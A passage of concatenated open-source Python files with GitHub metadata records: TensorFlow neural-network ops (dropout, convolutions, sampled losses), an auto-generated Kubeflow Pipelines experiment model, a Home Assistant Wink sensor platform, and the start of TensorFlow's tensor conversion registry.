divisor if `norm < sqrt(epsilon)`.
name: A name for this operation (optional).
Returns:
A `Tensor` with the same shape as `x`.
"""
with ops.op_scope([x], name, "l2_normalize") as name:
x = ops.convert_to_tensor(x, name="x")
square_sum = math_ops.reduce_sum(math_ops.square(x), [dim], keep_dims=True)
x_inv_norm = math_ops.rsqrt(math_ops.maximum(square_sum, epsilon))
return math_ops.mul(x, x_inv_norm, name=name)
def zero_fraction(value, name=None):
"""Returns the fraction of zeros in `value`.
If `value` is empty, the result is `nan`.
This is useful in summaries to measure and report sparsity. For example,
z = tf.Relu(...)
summ = tf.scalar_summary('sparsity', tf.zero_fraction(z))
Args:
value: A tensor of numeric type.
name: A name for the operation (optional).
Returns:
The fraction of zeros in `value`, with type `float32`.
"""
with ops.op_scope([value], name, "zero_fraction"):
value = ops.convert_to_tensor(value, name="value")
zero = constant_op.constant(0, dtype=value.dtype, name="zero")
return math_ops.reduce_mean(math_ops.cast(math_ops.equal(value, zero),
dtypes.float32))
def dropout(x, keep_prob, noise_shape=None, seed=None, name=None):
"""Computes dropout.
With probability `keep_prob`, outputs the input element scaled up by
`1 / keep_prob`, otherwise outputs `0`. The scaling is so that the expected
sum is unchanged.
By default, each element is kept or dropped independently. If `noise_shape`
is specified, it must be
[broadcastable](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
to the shape of `x`, and only dimensions with `noise_shape[i] == shape(x)[i]`
will make independent decisions. For example, if `shape(x) = [k, l, m, n]`
and `noise_shape = [k, 1, 1, n]`, each batch and channel component will be
kept independently and each row and column will be kept or not kept together.
Args:
x: A tensor.
keep_prob: A scalar `Tensor` with the same type as x. The probability
that each element is kept.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
seed: A Python integer. Used to create random seeds. See
[`set_random_seed`](../../api_docs/python/constant_op.md#set_random_seed)
for behavior.
name: A name for this operation (optional).
Returns:
A Tensor of the same shape of `x`.
Raises:
ValueError: If `keep_prob` is not in `(0, 1]`.
"""
with ops.op_scope([x], name, "dropout") as name:
x = ops.convert_to_tensor(x, name="x")
if isinstance(keep_prob, float) and not(0 < keep_prob <= 1):
raise ValueError("keep_prob must be a scalar tensor or a float in the "
"range (0, 1], got %g" % keep_prob)
keep_prob = ops.convert_to_tensor(
keep_prob, dtype=x.dtype, name="keep_prob")
keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
noise_shape = noise_shape or array_ops.shape(x)
# uniform [keep_prob, 1.0 + keep_prob)
random_tensor = keep_prob
random_tensor += random_ops.random_uniform(
noise_shape, seed=seed, dtype=x.dtype)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = math_ops.floor(random_tensor)
ret = x * math_ops.inv(keep_prob) * binary_tensor
ret.set_shape(x.get_shape())
return ret
def depthwise_conv2d(input, filter, strides, padding, name=None):
"""Depthwise 2-D convolution.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter tensor of shape
`[filter_height, filter_width, in_channels, channel_multiplier]`
containing `in_channels` convolutional filters of depth 1, `depthwise_conv2d`
applies a different filter to each input channel (expanding from 1 channel
to `channel_multiplier` channels for each), then concatenates the results
together. The output has `in_channels * channel_multiplier` channels.
In detail,
output[b, i, j, k * channel_multiplier + q] =
sum_{di, dj} input[b, strides[1] * i + di, strides[2] * j + dj, k] *
filter[di, dj, k, q]
Must have `strides[0] = strides[3] = 1`. For the most common case of the
same horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Args:
input: 4-D with shape `[batch, in_height, in_width, in_channels]`.
filter: 4-D with shape
`[filter_height, filter_width, in_channels, channel_multiplier]`.
strides: 1-D of size 4. The stride of the sliding window for each
dimension of `input`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: A name for this operation (optional).
Returns:
A 4-D `Tensor` of shape
`[batch, out_height, out_width, in_channels * channel_multiplier].`
"""
with ops.op_scope([input, filter], name, "depthwise") as name:
input = ops.convert_to_tensor(input, name="tensor_in")
filter = ops.convert_to_tensor(filter, name="filter_in")
# A shape is required to statically compute the number of separable filters.
if filter.get_shape().ndims is not None:
assert len(filter.get_shape()) == 4
in_channels = filter.get_shape()[2]
# Sanity checks, if shape information is available for the inputs.
if input.get_shape().ndims is not None:
assert len(input.get_shape()) == 4
assert input.get_shape()[3] == in_channels, (
"Mismatched input depth %d and number of depthwise filters %d." % (
input.get_shape()[3].value, in_channels))
else:
assert input.get_shape().ndims is not None, (
"Either tensor must provide static shape information.")
assert input.get_shape().ndims == 4
in_channels = input.get_shape()[3]
if in_channels == 1:
return nn_ops.conv2d(input, filter, strides, padding, name=name)
else:
# Create one separate convolution per channel.
convs = []
for channel in xrange(in_channels):
with ops.name_scope("depth%d" % channel) as channel_scope:
t_in = array_ops.slice(input, [0, 0, 0, channel], [-1, -1, -1, 1],
name="slice_inputs")
f_in = array_ops.slice(filter, [0, 0, channel, 0], [-1, -1, 1, -1],
name="slice_params")
convs.append(nn_ops.conv2d(t_in, f_in,
strides, padding, name=channel_scope))
# Concatenate the per-channel convolutions along the channel dimension.
return array_ops.concat(3, convs, name=name)
def separable_conv2d(input, depthwise_filter, pointwise_filter, strides,
padding,
name=None):
"""2-D convolution with separable filters.
Performs a depthwise convolution that acts separately on channels followed by
a pointwise convolution that mixes channels. Note that this is separability
between dimensions `[1, 2]` and `3`, not spatial separability between
dimensions `1` and `2`.
In detail,
output[b, i, j, k] = sum_{di, dj, q, r]
input[b, strides[1] * i + di, strides[2] * j + dj, q] *
depthwise_filter[di, dj, q, r] *
pointwise_filter[0, 0, q * channel_multiplier + r, k]
`strides` controls the strides for the depthwise convolution only, since
the pointwise convolution has implicit strides of `[1, 1, 1, 1]`. Must have
`strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Args:
input: 4-D `Tensor` with shape `[batch, in_height, in_width, in_channels]`.
depthwise_filter: 4-D `Tensor` with shape
`[filter_height, filter_width, in_channels, channel_multiplier]`.
Contains `in_channels` convolutional filters of depth 1.
pointwise_filter: 4-D `Tensor` with shape
`[1, 1, channel_multiplier * in_channels, out_channels]`. Pointwise
filter to mix channels after `depthwise_filter` has convolved spatially.
strides: 1-D of size 4. The strides for the depthwise convolution for
each dimension of `input`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: A name for this operation (optional).
Returns:
A 4-D `Tensor` of shape `[batch, out_height, out_width, out_channels]`.
"""
with ops.op_scope([input, depthwise_filter, pointwise_filter],
name, "separable_conv2d") as name:
input = ops.convert_to_tensor(input, name="tensor_in")
depthwise_filter = ops.convert_to_tensor(depthwise_filter,
name="depthwise_filter")
pointwise_filter = ops.convert_to_tensor(pointwise_filter,
name="pointwise_filter")
if pointwise_filter.get_shape().ndims is not None:
assert len(pointwise_filter.get_shape()) == 4
assert pointwise_filter.get_shape()[0] == 1
assert pointwise_filter.get_shape()[1] == 1
if depthwise_filter.get_shape().ndims and input.get_shape().ndims:
channel_multiplier = depthwise_filter.get_shape()[3]
in_channels = input.get_shape()[3]
out_channels = pointwise_filter.get_shape()[3]
# This would mean the separable convolutions is over-parametrized.
assert channel_multiplier * in_channels < out_channels
# The layout of the ops in the graph are expected to be as follows:
# separable_conv2d // Conv2D op corresponding to the pointwise conv.
# separable_conv2d/depthwise // Concat op for the deptwise outputs.
# separable_conv2d/depthwise/depth0 // Conv2D op for depth 0
# separable_conv2d/depthwise/depth1 // Conv2D op for depth 1
# separable_conv2d/depthwise/depth2 // Conv2D op for depth 2
depthwise = depthwise_conv2d(input, depthwise_filter, strides,
padding, name="depthwise")
return nn_ops.conv2d(depthwise, pointwise_filter, [1, 1, 1, 1],
padding="VALID", name=name)
def moments(x, axes, name=None):
"""Calculate the mean and variance of `x`.
The mean and variance are calculated by aggregating the contents of `x`
across `axes`. If `x` is 1-D and `axes = [0]` this is just the mean
and variance of a vector.
For so-called "global normalization" needed for convolutional filters pass
`axes=[0, 1, 2]` (batch, height, width). For batch normalization pass
`axes=[0]` (batch).
Args:
x: A `Tensor`.
axes: array of ints. Axes along which to compute mean and
variance.
name: Name used to scope the operations that compute the moments.
Returns:
Two `Tensor` objects: `mean` and `variance`.
"""
with ops.op_scope([x, axes], name, "moments"):
x = ops.convert_to_tensor(x, name="x")
x_shape = x.get_shape()
if all(x_shape[d].value is not None for d in axes):
# The shape is known in the relevant axes, so we can statically
# compute the divisor.
divisor = 1.0
for d in set(axes):
divisor *= x.get_shape()[d].value
divisor = constant_op.constant(1.0 / divisor, x.dtype, name="divisor")
else:
divisor = constant_op.constant(1.0, dtype=x.dtype)
x_dynamic_shape = array_ops.shape(x)
for d in set(axes):
divisor *= math_ops.cast(x_dynamic_shape[d], x.dtype)
divisor = math_ops.inv(divisor, name="divisor")
axes = constant_op.constant(axes, name="axes")
# Note: We do not use Mean here because it is very slow on GPU.
# Note 2: The expression below is potentially more stable.
# It is however a bit slower and stability doesn't appear to be an issue.
# mean = math_ops.reduce_sum(math_ops.mul(x, divisor), axes, name="mean")
# var = math_ops.reduce_sum(math_ops.mul(math_ops.square(x - mean),
# divisor), axes,
# name="variance")
mean = math_ops.mul(math_ops.reduce_sum(x, axes), divisor, name="mean")
var = math_ops.mul(math_ops.reduce_sum(math_ops.square(x - mean), axes),
divisor, name="variance")
return mean, var
def _sum_rows(x):
"""Returns a vector summing up each row of the matrix x."""
# _sum_rows(x) is equivalent to math_ops.reduce_sum(x, 1) when x is
# a matrix. The gradient of _sum_rows(x) is more efficient than
# reduce_sum(x, 1)'s gradient in today's implementation. Therefore,
# we use _sum_rows(x) in the nce_loss() computation since the loss
# is mostly used for training.
cols = array_ops.shape(x)[1]
ones_shape = array_ops.pack([cols, 1])
ones = array_ops.ones(ones_shape, x.dtype)
return array_ops.reshape(math_ops.matmul(x, ones), [-1])
def _compute_sampled_logits(weights, biases, inputs, labels, num_sampled,
num_classes, num_true=1,
sampled_values=None,
subtract_log_q=True,
remove_accidental_hits=False,
name=None):
"""Helper function for nce_loss and sampled_softmax_loss functions.
Computes sampled output training logits and labels suitable for implementing
e.g. noise-contrastive estimation (see nce_loss) or sampled softmax (see
sampled_softmax_loss).
Note: In the case where num_true > 1, we assign to each target class
the target probability 1 / num_true so that the target probabilities
sum to 1 per-example.
Args:
weights: A `Tensor` of shape `[num_classes, dim]`, or a list of `Tensor`
objects whose concatenation along dimension 0 has shape
`[num_classes, dim]`. The (possibly-sharded) class embeddings.
biases: A `Tensor` of shape `[num_classes]`. The class biases.
inputs: A `Tensor` of shape `[batch_size, dim]`. The forward
activations of the input network.
labels: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes. Note that this format differs from
the `labels` argument of `nn.softmax_cross_entropy_with_logits`.
num_sampled: An `int`. The number of classes to randomly sample per batch.
num_classes: An `int`. The number of possible classes.
num_true: An `int`. The number of target classes per training example.
sampled_values: a tuple of (`sampled_candidates`, `true_expected_count`,
`sampled_expected_count`) returned by a `*_candidate_sampler` function.
(if None, we default to `log_uniform_candidate_sampler`)
subtract_log_q: A `bool`. whether to subtract the log expected count of
the labels in the sample to get the logits of the true labels.
Default is True. Turn off for Negative Sampling.
remove_accidental_hits: A `bool`. whether to remove "accidental hits"
where a sampled class equals one of the target classes. Default is
False.
name: A name for the operation (optional).
Returns:
out_logits, out_labels: `Tensor` objects each with shape
`[batch_size, num_true + num_sampled]`, for passing to either
`nn.sigmoid_cross_entropy_with_logits` (NCE) or
`nn.softmax_cross_entropy_with_logits` (sampled softmax).
"""
if not isinstance(weights, list):
weights = [weights]
with ops.op_scope(
weights + [biases, inputs, labels], name, "compute_sampled_logits"):
if labels.dtype != dtypes.int64:
labels = math_ops.cast(labels, dtypes.int64)
labels_flat = array_ops.reshape(labels, [-1])
# Sample the negative labels.
# sampled shape: num_sampled vector
# true_expected_count shape = [batch_size, 1]
# sampled_expected_count shape = num_sampled vector
if sampled_values is None:
sampled_values = candidate_sampling_ops.log_uniform_candidate_sampler(
true_classes=labels,
num_true=num_true,
num_sampled=num_sampled,
unique=True,
range_max=num_classes)
# NOTE: pylint cannot tell that 'sampled_values' is a sequence
# pylint: disable=unpacking-non-sequence
sampled, true_expected_count, sampled_expected_count = sampled_values
# pylint: enable=unpacking-non-sequence
# weights shape is [num_classes, dim]
# labels_flat is a [batch_size * num_true] vector
# true_w shape is [batch_size * num_true, dim]
# true_b is a [batch_size * num_true] vector
true_w = embedding_ops.embedding_lookup(weights, labels_flat)
true_b = embedding_ops.embedding_lookup(biases, labels_flat)
# inputs shape is [batch_size, dim]
# true_w shape is [batch_size * num_true, dim]
# row_wise_dots is [batch_size, num_true, dim]
dim = array_ops.shape(true_w)[1:2]
new_true_w_shape = array_ops.concat(0, [[-1, num_true], dim])
row_wise_dots = math_ops.mul(
array_ops.expand_dims(inputs, 1),
array_ops.reshape(true_w, new_true_w_shape))
# We want the row-wise dot plus biases which yields a
# [batch_size, num_true] tensor of true_logits.
dots_as_matrix = array_ops.reshape(row_wise_dots,
array_ops.concat(0, [[-1], dim]))
true_logits = array_ops.reshape(_sum_rows(dots_as_matrix), [-1, num_true])
true_b = array_ops.reshape(true_b, [-1, num_true])
true_logits += true_b
# Lookup weights and biases for sampled labels.
# sampled is a num_sampled int vector
# sampled_w shape is [num_sampled, dim]
# sampled_b is a num_sampled float vector
sampled_w = embedding_ops.embedding_lookup(weights, sampled)
sampled_b = embedding_ops.embedding_lookup(biases, sampled)
# inputs has shape [batch_size, dim]
# sampled_w has shape [num_sampled, dim]
# sampled_b has shape [num_sampled]
# Apply X*W'+B, which yields [batch_size, num_sampled]
sampled_logits = math_ops.matmul(inputs,
sampled_w,
transpose_b=True) + sampled_b
if remove_accidental_hits:
acc_hits = candidate_sampling_ops.compute_accidental_hits(
labels, sampled, num_true=num_true)
acc_indices, acc_ids, acc_weights = acc_hits
# This is how SparseToDense expects the indices.
acc_indices_2d = array_ops.reshape(acc_indices, [-1, 1])
acc_ids_2d_int32 = array_ops.reshape(math_ops.cast(
acc_ids, dtypes.int32), [-1, 1])
sparse_indices = array_ops.concat(
1, [acc_indices_2d, acc_ids_2d_int32], "sparse_indices")
# Create sampled_logits_shape = [batch_size, num_sampled]
sampled_logits_shape = array_ops.concat(
0,
[array_ops.shape(labels)[:1], array_ops.expand_dims(num_sampled, 0)])
sampled_logits += sparse_ops.sparse_to_dense(
sparse_indices, sampled_logits_shape, acc_weights, 0.0)
if subtract_log_q:
# Subtract log of Q(l), prior probability that l appears in sampled.
true_logits -= math_ops.log(true_expected_count)
sampled_logits -= math_ops.log(sampled_expected_count)
# Construct output logits and labels. The true labels/logits start at col 0.
out_logits = array_ops.concat(1, [true_logits, sampled_logits])
# true_logits is a float tensor, ones_like(true_logits) is a float tensor
# of ones. We then divide by num_true to ensure the per-example labels sum
# to 1.0, i.e. form a proper probability distribution.
out_labels = array_ops.concat(
1, [array_ops.ones_like(true_logits) / num_true,
array_ops.zeros_like(sampled_logits)])
return out_logits, out_labels
def nce_loss(weights, biases, inputs, labels, num_sampled, num_classes,
num_true=1,
sampled_values=None,
remove_accidental_hits=False,
name="nce_loss"):
"""Computes and returns the noise-contrastive estimation training loss.
See [Noise-contrastive estimation: A new estimation principle for
unnormalized statistical models]
(http://www.jmlr.org/proceedings/papers/v9/gutmann10a/gutmann10a.pdf).
Also see our [Candidate Sampling Algorithms Reference]
(http://www.tensorflow.org/extras/candidate_sampling.pdf)
Note: In the case where `num_true` > 1, we assign to each target class
the target probability 1 / `num_true` so that the target probabilities
sum to 1 per-example.
Note: It would be useful to allow a variable number of target classes per
example. We hope to provide this functionality in a future release.
For now, if you have a variable number of target classes, you can pad them
out to a constant number by either repeating them or by padding
with an otherwise unused class.
Args:
weights: A `Tensor` of shape `[num_classes, dim]`, or a list of `Tensor`
objects whose concatenation along dimension 0 has shape
[num_classes, dim]. The (possibly-sharded) class embeddings.
biases: A `Tensor` of shape `[num_classes]`. The class biases.
inputs: A `Tensor` of shape `[batch_size, dim]`. The forward
activations of the input network.
labels: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
num_sampled: An `int`. The number of classes to randomly sample per batch.
num_classes: An `int`. The number of possible classes.
num_true: An `int`. The number of target classes per training example.
sampled_values: a tuple of (`sampled_candidates`, `true_expected_count`,
`sampled_expected_count`) returned by a `*_candidate_sampler` function.
(if None, we default to `log_uniform_candidate_sampler`)
remove_accidental_hits: A `bool`. Whether to remove "accidental hits"
where a sampled class equals one of the target classes. If set to
`True`, this is a "Sampled Logistic" loss instead of NCE, and we are
learning to generate log-odds instead of log probabilities. See
our [Candidate Sampling Algorithms Reference]
(http://www.tensorflow.org/extras/candidate_sampling.pdf).
Default is False.
name: A name for the operation (optional).
Returns:
A `batch_size` 1-D tensor of per-example NCE losses.
"""
logits, labels = _compute_sampled_logits(
weights, biases, inputs, labels, num_sampled, num_classes,
num_true=num_true,
sampled_values=sampled_values,
subtract_log_q=True,
remove_accidental_hits=remove_accidental_hits,
name=name)
sampled_losses = sigmoid_cross_entropy_with_logits(logits,
labels,
name="sampled_losses")
# sampled_losses is batch_size x {true_loss, sampled_losses...}
# We sum out true and sampled losses.
return _sum_rows(sampled_losses)
def sampled_softmax_loss(weights, biases, inputs, labels, num_sampled,
num_classes, num_true=1,
sampled_values=None,
remove_accidental_hits=True,
name="sampled_softmax_loss"):
"""Computes and returns the sampled softmax training loss.
This is a faster way to train a softmax classifier over a huge number of
classes.
This operation is for training only. It is generally an underestimate of
the full softmax loss.
At inference time, you can compute full softmax probabilities with the
expression `tf.nn.softmax(tf.matmul(inputs, weights) + biases)`.
See our [Candidate Sampling Algorithms Reference]
(http://www.tensorflow.org/extras/candidate_sampling.pdf)
Also see Section 3 of http://arxiv.org/abs/1412.2007 for the math.
Args:
weights: A `Tensor` of shape `[num_classes, dim]`, or a list of `Tensor`
objects whose concatenation along dimension 0 has shape
[num_classes, dim]. The (possibly-sharded) class embeddings.
biases: A `Tensor` of shape `[num_classes]`. The class biases.
inputs: A `Tensor` of shape `[batch_size, dim]`. The forward
activations of the input network.
labels: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes. Note that this format differs from
the `labels` argument of `nn.softmax_cross_entropy_with_logits`.
num_sampled: An `int`. The number of classes to randomly sample per batch.
num_classes: An `int`. The number of possible classes.
num_true: An `int`. The number of target classes per training example.
sampled_values: a tuple of (`sampled_candidates`, `true_expected_count`,
`sampled_expected_count`) returned by a `*_candidate_sampler` function.
(if None, we default to `log_uniform_candidate_sampler`)
remove_accidental_hits: A `bool`. whether to remove "accidental hits"
where a sampled class equals one of the target classes. Default is
True.
name: A name for the operation (optional).
Returns:
A `batch_size` 1-D tensor of per-example sampled softmax losses.
"""
logits, labels = _compute_sampled_logits(
weights, biases, inputs, labels, num_sampled, num_classes,
num_true=num_true,
sampled_values=sampled_values,
subtract_log_q=True,
remove_accidental_hits=remove_accidental_hits,
name=name)
sampled_losses = nn_ops.softmax_cross_entropy_with_logits(logits, labels)
# sampled_losses is a batch_size vector.
return sampled_losses
|
{
"content_hash": "7fb78ca090aaf653045ea4a558cf4012",
"timestamp": "",
"source": "github",
"line_count": 867,
"max_line_length": 80,
"avg_line_length": 42.509803921568626,
"alnum_prop": 0.6731875406989364,
"repo_name": "MehdiSfr/tensor-flow",
"id": "17160f909e0ec12f303ef92647e4a92231fa5785",
"size": "37601",
"binary": false,
"copies": "1",
"ref": "refs/heads/branch_mehdiExpr",
"path": "tensorflow/python/ops/nn.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "136455"
},
{
"name": "C++",
"bytes": "5591657"
},
{
"name": "CSS",
"bytes": "107"
},
{
"name": "HTML",
"bytes": "640055"
},
{
"name": "Java",
"bytes": "49257"
},
{
"name": "JavaScript",
"bytes": "6252"
},
{
"name": "Jupyter Notebook",
"bytes": "329336"
},
{
"name": "Objective-C",
"bytes": "1288"
},
{
"name": "Protocol Buffer",
"bytes": "45325"
},
{
"name": "Python",
"bytes": "2684789"
},
{
"name": "Shell",
"bytes": "5104"
},
{
"name": "TypeScript",
"bytes": "256549"
}
],
"symlink_target": ""
}
|
"""
Kubeflow Pipelines API
This file contains REST API specification for Kubeflow Pipelines. The file is autogenerated from the swagger definition.
Contact: kubeflow-pipelines@google.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kfp_server_api.configuration import Configuration
class ApiExperiment(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'name': 'str',
'description': 'str',
'created_at': 'datetime',
'resource_references': 'list[ApiResourceReference]',
'storage_state': 'ApiExperimentStorageState'
}
attribute_map = {
'id': 'id',
'name': 'name',
'description': 'description',
'created_at': 'created_at',
'resource_references': 'resource_references',
'storage_state': 'storage_state'
}
def __init__(self, id=None, name=None, description=None, created_at=None, resource_references=None, storage_state=None, local_vars_configuration=None): # noqa: E501
"""ApiExperiment - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._name = None
self._description = None
self._created_at = None
self._resource_references = None
self._storage_state = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if description is not None:
self.description = description
if created_at is not None:
self.created_at = created_at
if resource_references is not None:
self.resource_references = resource_references
if storage_state is not None:
self.storage_state = storage_state
@property
def id(self):
"""Gets the id of this ApiExperiment. # noqa: E501
Output. Unique experiment ID. Generated by API server. # noqa: E501
:return: The id of this ApiExperiment. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ApiExperiment.
Output. Unique experiment ID. Generated by API server. # noqa: E501
:param id: The id of this ApiExperiment. # noqa: E501
:type id: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this ApiExperiment. # noqa: E501
Required input field. Unique experiment name provided by user. # noqa: E501
:return: The name of this ApiExperiment. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ApiExperiment.
Required input field. Unique experiment name provided by user. # noqa: E501
:param name: The name of this ApiExperiment. # noqa: E501
:type name: str
"""
self._name = name
@property
def description(self):
"""Gets the description of this ApiExperiment. # noqa: E501
:return: The description of this ApiExperiment. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this ApiExperiment.
:param description: The description of this ApiExperiment. # noqa: E501
:type description: str
"""
self._description = description
@property
def created_at(self):
"""Gets the created_at of this ApiExperiment. # noqa: E501
Output. The time that the experiment created. # noqa: E501
:return: The created_at of this ApiExperiment. # noqa: E501
:rtype: datetime
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this ApiExperiment.
Output. The time that the experiment created. # noqa: E501
:param created_at: The created_at of this ApiExperiment. # noqa: E501
:type created_at: datetime
"""
self._created_at = created_at
@property
def resource_references(self):
"""Gets the resource_references of this ApiExperiment. # noqa: E501
Optional input field. Specify which resource this run belongs to. For Experiment, the only valid resource reference is a single Namespace. # noqa: E501
:return: The resource_references of this ApiExperiment. # noqa: E501
:rtype: list[ApiResourceReference]
"""
return self._resource_references
@resource_references.setter
def resource_references(self, resource_references):
"""Sets the resource_references of this ApiExperiment.
Optional input field. Specify which resource this run belongs to. For Experiment, the only valid resource reference is a single Namespace. # noqa: E501
:param resource_references: The resource_references of this ApiExperiment. # noqa: E501
:type resource_references: list[ApiResourceReference]
"""
self._resource_references = resource_references
@property
def storage_state(self):
"""Gets the storage_state of this ApiExperiment. # noqa: E501
:return: The storage_state of this ApiExperiment. # noqa: E501
:rtype: ApiExperimentStorageState
"""
return self._storage_state
@storage_state.setter
def storage_state(self, storage_state):
"""Sets the storage_state of this ApiExperiment.
:param storage_state: The storage_state of this ApiExperiment. # noqa: E501
:type storage_state: ApiExperimentStorageState
"""
self._storage_state = storage_state
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiExperiment):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiExperiment):
return True
return self.to_dict() != other.to_dict()
|
{
"content_hash": "5963476d12c26de55acf5ae1c435bc79",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 169,
"avg_line_length": 30.69921875,
"alnum_prop": 0.5976587352080417,
"repo_name": "kubeflow/pipelines",
"id": "3c6369981e9e9d212e6f9ca840b8db78ff4ac90a",
"size": "7876",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "backend/api/v1beta1/python_http_client/kfp_server_api/models/api_experiment.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "799"
},
{
"name": "CSS",
"bytes": "2171"
},
{
"name": "Dockerfile",
"bytes": "49331"
},
{
"name": "Go",
"bytes": "1903937"
},
{
"name": "HTML",
"bytes": "3656"
},
{
"name": "JavaScript",
"bytes": "544297"
},
{
"name": "Jinja",
"bytes": "938"
},
{
"name": "Jupyter Notebook",
"bytes": "359548"
},
{
"name": "Makefile",
"bytes": "22164"
},
{
"name": "Mustache",
"bytes": "23652"
},
{
"name": "PowerShell",
"bytes": "3194"
},
{
"name": "Python",
"bytes": "5684887"
},
{
"name": "Shell",
"bytes": "264595"
},
{
"name": "Smarty",
"bytes": "8295"
},
{
"name": "Starlark",
"bytes": "553"
},
{
"name": "TypeScript",
"bytes": "4294958"
}
],
"symlink_target": ""
}
|
""" Support for Wink sensors. """
import logging
# pylint: disable=no-name-in-module, import-error
import homeassistant.external.wink.pywink as pywink
from homeassistant.helpers.entity import Entity
from homeassistant.const import CONF_ACCESS_TOKEN, STATE_OPEN, STATE_CLOSED
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the Wink platform. """
if discovery_info is None:
token = config.get(CONF_ACCESS_TOKEN)
if token is None:
logging.getLogger(__name__).error(
"Missing wink access_token - "
"get one at https://winkbearertoken.appspot.com/")
return
pywink.set_bearer_token(token)
add_devices(WinkSensorDevice(sensor) for sensor in pywink.get_sensors())
class WinkSensorDevice(Entity):
""" represents a wink sensor within home assistant. """
def __init__(self, wink):
self.wink = wink
@property
def state(self):
""" Returns the state. """
return STATE_OPEN if self.is_open else STATE_CLOSED
@property
def unique_id(self):
""" Returns the id of this wink sensor """
return "{}.{}".format(self.__class__, self.wink.deviceId())
@property
def name(self):
""" Returns the name of the sensor if any. """
return self.wink.name()
def update(self):
""" Update state of the sensor. """
self.wink.updateState()
@property
def is_open(self):
""" True if door is open. """
return self.wink.state()
|
{
"content_hash": "923a13b80722c1cd6b12da45d14b63a3",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 76,
"avg_line_length": 28.327272727272728,
"alnum_prop": 0.6225930680359435,
"repo_name": "sanmiguel/home-assistant",
"id": "ff61f02d041251026da0dd963ac1f073ddffedad",
"size": "1558",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "homeassistant/components/sensor/wink.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1185687"
},
{
"name": "Python",
"bytes": "681010"
},
{
"name": "Shell",
"bytes": "5074"
}
],
"symlink_target": ""
}
|
"""Registry for tensor conversion functions."""
# pylint: disable=g-bad-name
import collections
import threading
import numpy as np
import six
from tensorflow.python.util import lazy_loader
from tensorflow.python.util.tf_export import tf_export
# Loaded lazily due to a circular dependency
# ops->tensor_conversion_registry->constant_op->ops.
constant_op = lazy_loader.LazyLoader(
"constant_op", globals(),
"tensorflow.python.framework.constant_op")
_tensor_conversion_func_registry = collections.defaultdict(list)
_tensor_conversion_func_cache = {}
_tensor_conversion_func_lock = threading.Lock()
# Instances of these types are always converted using
# `_default_conversion_function`.
_UNCONVERTIBLE_TYPES = six.integer_types + (
float,
np.generic,
np.ndarray,
)
def _default_conversion_function(value, dtype, name, as_ref):
del as_ref # Unused.
return constant_op.constant(value, dtype, name=name)
# TODO(josh11b): Add ctx argument to conversion_func() signature.
@tf_export("register_tensor_conversion_function")
def register_tensor_conversion_function(base_type,
conversion_func,
priority=100):
"""Registers a function for converting objects of `base_type` to `Tensor`.
The conversion function must have the following signature:
```python
def conversion_func(value, dtype=None, name=None, as_ref=False):
# ...
```
It must return a `Tensor` with the given `dtype` if specified. If the
conversion function creates a new `Tensor`, it should use the given
`name` if specified. All exceptions will be propagated to the caller.
The conversion function may return `NotImplemented` for some
inputs. In this case, the conversion process will continue to try
subsequent conversion functions.
If `as_ref` is true, the function must return a `Tensor` reference,
such as a `Variable`.
NOTE: The conversion functions will execute in order of priority,
followed by order of registration. To ensure that a conversion function
`F` runs before another conversion function `G`, ensure that `F` is
registered with a smaller priority than `G`.
Args:
base_type: The base type or tuple of base types for all objects that
`conversion_func` accepts.
conversion_func: A function that converts instances of `base_type` to
`Tensor`.
priority: Optional integer that indicates the priority for applying this
conversion function. Conversion functions with smaller priority values run
earlier than conversion functions with larger priority values. Defaults to
100.
Raises:
